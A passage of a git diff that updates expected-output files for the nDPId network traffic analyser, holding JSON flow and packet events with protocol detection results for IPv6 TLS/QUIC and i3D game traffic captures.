+00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1448269127400,"flow_last_seen":1448269138520,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":12133,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":45931,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269139314,"flow_last_seen":1448269139321,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269127922,"flow_last_seen":1448269127940,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:803::2008","src_port":58660,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} -00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1448269139219,"flow_last_seen":1448269139339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} -00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1448269144450,"flow_last_seen":1448269144884,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":13365,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1448269138575,"flow_last_seen":1448269138746,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00833{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1448269139219,"flow_last_seen":1448269139339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":5364,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1448269144450,"flow_last_seen":1448269144884,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":13365,"flow_avg_l4_payload_len":514,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Cert Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00610{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269123954,"flow_last_seen":1448269123971,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4006:804::200e","src_port":40526,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1448269143410,"flow_last_seen":1448269143539,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} @@ -104,9 +104,9 @@ ~~ total active/idle flows...: 15/15 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5960301 bytes -~~ total memory freed........: 5960301 bytes -~~ total allocations/frees...: 118433/118433 +~~ total memory allocated....: 6093935 bytes +~~ total memory freed........: 6093935 bytes +~~ total allocations/frees...: 121195/121195 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2310 chars diff --git a/test/results/i3d.pcap.out b/test/results/i3d.pcap.out new file mode 100644 index 000000000..ea01322ba --- /dev/null +++ b/test/results/i3d.pcap.out @@ -0,0 +1,44 @@ +00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"i3d.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"i3d.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1643566147188} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"i3d.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643566147188,"flow_last_seen":1643566147188,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643566147188,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":60476,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"i3d.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1643566147188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643566147188,"pkt":"eJS0JASgYDjgxTWgCABFAABmU1sAAH8R+EzAqAJk1aNXL+w8w1QAUphQAAEARgADz6gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA95U="} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"i3d.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643566147188,"flow_last_seen":1643566147188,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643566147188,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":60476,"dst_port":50004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"i3d.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1643566147212,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643566147212,"pkt":"YDjgxTWgeJS0JASgCABFAABmT1JAADsRAFbVo1cvwKgCZMNU7DwAUkFJAAIARgADz6g5MC4xODYuMTMyLjEzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA7Dw="} +00620{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"i3d.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1643566147224,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1643566147224,"pkt":"eJS0JASgYDjgxTWgCABFAACoU10AAH8R+AjAqAJk1aNXL+w8w1QAlAApkHiUJQdnxvIAA8+ovt4AAfZr38uFzZsIi8ZCCYTQPXHtOHv0CzWfwBUspYBgwVoFrs7CIolbntTbNC\/JUzHrMPTo+XsMJQLsyF07SXVZB\/s4ty9sKDXZEitaLRpRsI4IOF0cfX+Uc0Uf1VgbctkHIRIB7WkAQW7E9Ft4IwjFcGTVfDpX71058AMMAIA="} +00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"i3d.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":2431,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1643572927206} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"i3d.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643572927206,"flow_last_seen":1643572927206,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643572927206,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":55205,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"i3d.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1643572927206,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643572927206,"pkt":"eJS0JASgYDjgxTWgCABFAABmU0sAAH8R+FzAqAJk1aNXL9elw1QAUhLaAAEARgADz6gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkaM="} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"i3d.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643572927206,"flow_last_seen":1643572927206,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643572927206,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":55205,"dst_port":50004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"i3d.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1643572927231,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643572927231,"pkt":"YDjgxTWgeJS0JASgCABFAABmdVlAADsR2k7Vo1cvwKgCZMNU16UAUmp3AAIARgADz6g5MC4xODYuMTMyLjEzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA16U="} +00924{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"i3d.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1643572927237,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":407,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":407,"pkt_l4_len":373,"thread_ts_msec":1643572927237,"pkt":"eJS0JASgYDjgxTWgCABFAAGJU04AAH8R9zbAqAJk1aNXL9elw1QBdefukHjAYBrNpDIAA8+ovt4AAWLcvr+lZkOZKn9N4wir1XJMMpIj+rYcuzK9b1B1dSYUAusllGSD7Iks\/lDJGHLRp26V2oDMfvBvVg\/cehuUzNPuTaUyCbeYyBzqdN2QAWcCejnBWaAwUIIs\/jXqYgZrYxUTaCdL+6NeLrqdS7Vo5T25dnjeJo81dd3KqWFk2zyE5wTxTLybdmbQUV3Ko3TOFtK8OGoZc3PzKCoWW0DiwqJ40DNSzxp9qHRwhnGsEgZlbxs7f4dVoHC9WXsc6WP5YQOu93sjesws4bynoNqKgNl3SMX+lEYrOX0Ex+m8gzL5OwV9KAw2ujOO62zCH3sUJuEubxY489PEvx7xGvYJYlElAmw7xQ1BXYxwsg\/f06VJLUwc0mmioSN1wd226+8foscTKbQr8HhvEn4cO82JBw50ZgifvJteHJ7GxVcU\/EgZEjYJcSMvKOfS+EOUIjuBX2FFEQgqdE0m7zcGGYA="} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":31,"source":"i3d.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1643566147188,"flow_last_seen":1643566147407,"flow_idle_time":200000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":331,"flow_tot_l4_payload_len":2431,"flow_avg_l4_payload_len":162,"midstream":0,"thread_ts_msec":1643572927312,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":60476,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":31,"source":"i3d.pcap","alias":"nDPId-test","packets-captured":31,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":13434,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1643574967215} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"i3d.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643574967215,"flow_last_seen":1643574967215,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643574967215,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":62620,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00531{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"i3d.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1643574967215,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643574967215,"pkt":"eJS0JASgYDjgxTWgCABFAABm4pkAAH8RaQ7AqAJk1aNXL\/Scw1QAUnfBAAEARgADz6gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD8U="} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"i3d.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643574967215,"flow_last_seen":1643574967215,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643574967215,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":62620,"dst_port":50004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00530{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"i3d.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1643574967246,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":116,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":116,"pkt_l4_len":82,"thread_ts_msec":1643574967246,"pkt":"YDjgxTWgeJS0JASgCABFAABmqfdAADsRpbDVo1cvwKgCZMNU9JwAUjCJAAIARgADz6g5MC4xODYuMTMyLjEzMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA9Jw="} +00818{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"i3d.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1643574967251,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":327,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":327,"pkt_l4_len":293,"thread_ts_msec":1643574967251,"pkt":"eJS0JASgYDjgxTWgCABFAAE54qIAAH8RaDLAqAJk1aNXL\/Scw1QBJQsjkHhO0SCjy\/IAA8+ovt4AAUYE8DbnY+F2hLA62FYWMsCb6Zmw75rsnbyZ4iy2P5qxgVCDbQD+AZr2MnG94xOKLKbJ6e0gLIrOt3dmrdg5D3ID03QQaLQvXVm8Un1iw5E+eIsb41N6KANtFCt71s0VmZrUkf1LNxnlzJAdbzX3KppLCUDo3KeguYqV6SeAD6JVZlW7ZMkhG0EAAY\/U2qeQ551A5yo9KqYr1vJ6hcYhiN7OcJhvYHrjjp03R9P7x15fPzuP7cBcu2mMmA8wMwrmspxIjzzpSS4lDTqWhAn60sO7wZyuA5SeyDvEi2pMQwrzXDhbtJX+LXgP0MdXCc1lEcV9Ir2iPuS\/2W\/B5\/BliP5f54+DI\/oJiIHRkyOA"} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":46,"source":"i3d.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1643572927206,"flow_last_seen":1643572927312,"flow_idle_time":200000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":1167,"flow_tot_l4_payload_len":11003,"flow_avg_l4_payload_len":733,"midstream":0,"thread_ts_msec":1643574967460,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":55205,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"i3D","breed":"Acceptable","category":"Game"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"i3d.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643575387216,"flow_last_seen":1643575387216,"flow_idle_time":200000,"flow_min_l4_payload_len":74,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1643575387216,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"213.163.87.47","src_port":62461,"dst_port":50004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 